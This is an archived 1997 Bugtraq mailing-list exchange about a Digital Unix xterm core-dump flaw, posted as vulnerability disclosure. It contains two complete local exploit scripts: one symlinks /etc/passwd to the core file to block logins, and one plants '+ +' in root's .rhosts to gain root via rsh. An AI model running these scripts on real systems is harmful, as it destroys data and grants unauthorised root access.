[5588] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Digital Unix Security Problem

daemon@ATHENA.MIT.EDU (Andrew Brown)
Thu Nov 13 12:27:53 1997

Errors-To: receipts@daemon.org
Date: 	Thu, 13 Nov 1997 11:32:23 -0500
Reply-To: Andrew Brown <codewarrior@daemon.org>
From: Andrew Brown <codewarrior@DAEMON.ORG>
X-To:         tom@sba.miami.edu
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.OSF.3.96.971112142044.12555C-100000@homer.bus.miami.edu>
              from "Tom Leffingwell" at Nov 12, 97 02:51:40 pm

>        Even with a buffer overflow, I've never seen anyone exploit on one
>DU. If anyone has done so sucessfully, plese email me.  Despite that, a
>person with basic knowledge of unix could easily do something like:
>
>#/!bin/csh
>cd /tmp
>ln -s /etc/passwd /tmp/core
>setenv DISPLAY abcdefghi
>/usr/bin/X11/xterm
>
>        The contents of /etc/passwd becomes xterm's core, preventing
>further logins.  Obviously you could do things without an immediate impact
>such as ln -s /vmunix /tmp/core.

or...if the system you're on is actually running r-services, you could do

#!/bin/sh
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
rsh localhost

which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file.  then all that remains
is the rsh localhost and you're all set!

considerably easier than a buffer overflow exploit...

--
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
codewarrior@daemon.org                               that goes *ping*!"
warfare@graffiti.com      * "information is power -- share the wealth."

home help back first fref pref prev next nref lref last post